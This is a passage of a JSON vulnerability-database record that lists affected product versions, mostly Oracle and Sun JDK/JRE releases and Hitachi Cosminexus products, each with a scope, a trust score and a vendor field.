"1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r27.7.6" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.5" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.1" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server enterprise version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus client version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus application server enterprise version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "505-00" }, { "model": "cosminexus studio version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus application server enterprise version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus client version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus client version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer light version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jrockit", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "r28.2.8" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server enterprise version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "cosminexus application server standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere business services fabric for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "cosminexus developer standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "linux enterprise server 